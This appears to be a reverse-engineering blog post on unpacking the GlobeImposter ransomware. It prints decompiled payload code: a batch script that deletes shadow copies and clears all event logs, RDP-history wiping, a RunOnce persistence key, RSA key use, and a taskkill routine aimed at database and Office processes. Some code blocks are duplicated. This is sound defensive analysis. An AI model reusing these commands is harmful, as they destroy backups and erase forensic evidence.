Goal: Unpack GlobeImposter ransomware payload using WriteProcessMemory API buffer’s dump (check out the same method as Locky from the previous blog).
Tool: ollyDbg, CFF Explorer, IDA Pro
Credit: @dvk01uk
Malware SHA-256: 5b88544bebacba38708685b905a94742c7798bf64b6f90f46acbc3f6de4399e7
Original GlobeImposter sample:
Background:
GlobeImposter ransomware utilizes a loader/patcher algorithm patching and unloading the decoded payload in memory.
Theory:
GlobeImposter ransomware patches itself using CreateProcessA API setting the creation flag to CREATE_SUSPENDED and writing itself into the buffer via WriteProcessMemory API. Next, the ransomware process won’t be executed immediately; it does not start until called ResumeThread. So, the ransomware has time to patch in memory.
Practice:
I. Load Ollydbg and click “File” ->
II. Click “Go to” -> “Expression” -> Type “WriteProcessMemory” and set up a breakpoint on it using F2.
III. Run the process using F9 and follow buffer to observe the unpacked GlobeImposter in the dump section.
IV. Then, click on “Backup” -> “Save data to file.”
V. Verify the exported payload and IAT in CFF Explorer. Profit!
VI. Enjoy analyzing the decoded payload in IDA Pro!
(1) Registry persistency:
HKEY\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\CertificatesCheck
(b) GlobeImposter vssadmin & host script:
GetTempFileNameW(&PathName, L”__tmp”, 0, &TempFileName);
lstrcatW(&TempFileName, L”.bat”);
result = CreateFileW(&TempFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
v1 = result;
if ( result != (HANDLE)-1 )
{
v2 = lstrlenA(“@echo off\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\nreg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\ncd %userprofile%\\documents\\\r\nattrib Default.rdp -s -h\r\ndel Default.rdp \r\nfor /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””);
WriteFile(
v1,
“@echo off\r\n”
“vssadmin.exe Delete Shadows /All /Quiet\r\n”
“reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\n”
“reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\n”
“reg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\n”
“cd %userprofile%\\documents\\\r\n”
“attrib Default.rdp -s -h\r\n”
“del Default.rdp \r\n”
“for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””,
v2,
&NumberOfBytesWritten,
0);
CloseHandle(v1);
result = (HANDLE)sub_4126D7(&TempFileName);
lstrcatW(&TempFileName, L”.bat”);
result = CreateFileW(&TempFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
v1 = result;
if ( result != (HANDLE)-1 )
{
v2 = lstrlenA(“@echo off\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\nreg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\ncd %userprofile%\\documents\\\r\nattrib Default.rdp -s -h\r\ndel Default.rdp \r\nfor /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””);
WriteFile(
v1,
“@echo off\r\n”
“vssadmin.exe Delete Shadows /All /Quiet\r\n”
“reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\n”
“reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\n”
“reg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\n”
“cd %userprofile%\\documents\\\r\n”
“attrib Default.rdp -s -h\r\n”
“del Default.rdp \r\n”
“for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””,
v2,
&NumberOfBytesWritten,
0);
CloseHandle(v1);
result = (HANDLE)sub_4126D7(&TempFileName);
(c) RSA public encryption key function value:
v18 = RSA_Encrypt_Function(
“A57EEE174A1DBCC23CD0CC6045AF9E1CF07706D30588C86941DEC3DA5AA5483BBC85988DA7B18B5C18DA8BF09CC8AF7FD46E7DD57F729A”
“3D122387BCFE8B86F7A1D051895CD8ABE50F52913C62729979155C7CEF78B114921691FD7F1E1B206B5F98700A053CF04DBE1C44A2D843”
“EF0C85468F61ABCF5559FE56F124C383B538F4F16ADB61C42AB3B6BFBDDAB4ADC9CB9DFA615A6506CFCAA752C78B270C568B786FF9D50C”
“A30E21C5431F83E4A2A7695C24BA262233F28D4253CB01C64410C246291DCE84147EB593730A90F013423DE1DFEA1823CCD07B82C36F6E”
“EF0F6916219D036D395C4CEEC4FDF20CD997ABB3B8B1F2B6D4BBB5065E31516D7386BD23”,
v15,
0xC0u);
….
v3 = lpString;
memset(&v8, 0, 0x400u);
memset(&v10, 0, 0x200u);
sub_4108D0(&v12, v4);
sub_40FBC8(&v11);
sub_40FDEC(&v9);
v5 = lstrlenA(“rsa_encrypt”);
if ( !sub_40FB4F((int)&v11, (int)&v9, “rsa_encrypt”, v5) && !sub_40F391(&v14, v3) && !sub_40F391(&v15, “010001”) )
{
v13 = (unsigned int)(sub_40F4AA(&v14) + 7) >> 3;
memmove(&v8, a2, a3);
if ( sub_41028B(&v11, v6, a3, &v8, (int)&v10) )
memset(&v10, 0, a3);
“A57EEE174A1DBCC23CD0CC6045AF9E1CF07706D30588C86941DEC3DA5AA5483BBC85988DA7B18B5C18DA8BF09CC8AF7FD46E7DD57F729A”
“3D122387BCFE8B86F7A1D051895CD8ABE50F52913C62729979155C7CEF78B114921691FD7F1E1B206B5F98700A053CF04DBE1C44A2D843”
“EF0C85468F61ABCF5559FE56F124C383B538F4F16ADB61C42AB3B6BFBDDAB4ADC9CB9DFA615A6506CFCAA752C78B270C568B786FF9D50C”
“A30E21C5431F83E4A2A7695C24BA262233F28D4253CB01C64410C246291DCE84147EB593730A90F013423DE1DFEA1823CCD07B82C36F6E”
“EF0F6916219D036D395C4CEEC4FDF20CD997ABB3B8B1F2B6D4BBB5065E31516D7386BD23”,
v15,
0xC0u);
….
v3 = lpString;
memset(&v8, 0, 0x400u);
memset(&v10, 0, 0x200u);
sub_4108D0(&v12, v4);
sub_40FBC8(&v11);
sub_40FDEC(&v9);
v5 = lstrlenA(“rsa_encrypt”);
if ( !sub_40FB4F((int)&v11, (int)&v9, “rsa_encrypt”, v5) && !sub_40F391(&v14, v3) && !sub_40F391(&v15, “010001”) )
{
v13 = (unsigned int)(sub_40F4AA(&v14) + 7) >> 3;
memmove(&v8, a2, a3);
if ( sub_41028B(&v11, v6, a3, &v8, (int)&v10) )
memset(&v10, 0, a3);
(d) Taskill function terminating the following processes:
- “sql”
- “outlook”
- “ssms”
- “postgre”
- “1c”
- “excel”
- “word”
memset(&StartupInfo, 0, 0x44u);
StartupInfo.cb = 68;
result = CreateToolhelp32Snapshot(2u, 0);
v2 = result;
if ( result != (HANDLE)-1 )
{
pe.dwSize = 556;
Process32FirstW(result, &pe);
do
{
v3 = (LPCSTR *)off_41B950;
while ( 1 )
{
v4 = sub_4128DF(pe.szExeFile, 0);
v5 = lstrlenW(pe.szExeFile);
for ( i = 0; i < v5; i = v8 + 1 )
{
v7 = sub_40C31A((char *)v4[i]);
v4[v8] = v7;
}
if ( StrStrA(v4, *v3) )
break;
++v3;
if ( (signed int)v3 >= (signed int)&unk_41B96C )
goto LABEL_10;
}
v9 = HeapCreate(0, 0x1000u, 0);
v10 = (CHAR *)HeapAlloc(v9, 0, 0x100u);
wsprintfA(v10, “%d”, pe.th32ProcessID);
lstrcpyA(&String1, “taskkill /F /T /PID “);
lstrcatA(&String1, v10);
CreateProcessA(0, &String1, 0, 0, 0, 0x8000000u, 0, 0, &StartupInfo, &ProcessInformation);
LABEL_10:
;
}
while ( Process32NextW(v2, &pe) );
result = (HANDLE)CloseHandle(v2);
}
return result;
StartupInfo.cb = 68;
result = CreateToolhelp32Snapshot(2u, 0);
v2 = result;
if ( result != (HANDLE)-1 )
{
pe.dwSize = 556;
Process32FirstW(result, &pe);
do
{
v3 = (LPCSTR *)off_41B950;
while ( 1 )
{
v4 = sub_4128DF(pe.szExeFile, 0);
v5 = lstrlenW(pe.szExeFile);
for ( i = 0; i < v5; i = v8 + 1 )
{
v7 = sub_40C31A((char *)v4[i]);
v4[v8] = v7;
}
if ( StrStrA(v4, *v3) )
break;
++v3;
if ( (signed int)v3 >= (signed int)&unk_41B96C )
goto LABEL_10;
}
v9 = HeapCreate(0, 0x1000u, 0);
v10 = (CHAR *)HeapAlloc(v9, 0, 0x100u);
wsprintfA(v10, “%d”, pe.th32ProcessID);
lstrcpyA(&String1, “taskkill /F /T /PID “);
lstrcatA(&String1, v10);
CreateProcessA(0, &String1, 0, 0, 0, 0x8000000u, 0, 0, &StartupInfo, &ProcessInformation);
LABEL_10:
;
}
while ( Process32NextW(v2, &pe) );
result = (HANDLE)CloseHandle(v2);
}
return result;
(d) Targeted exclusion extensions and README extortion message in Olly:
Reverse Engineering, Malware Deep Insight 
can you please make a decryption tool for ..726 extension ransomware globelimposter and can pay $400 … please let me know and how to contact you via email ?
LikeLike
keep it up dude good work
LikeLike
Thanks, team. Will surely do.
LikeLike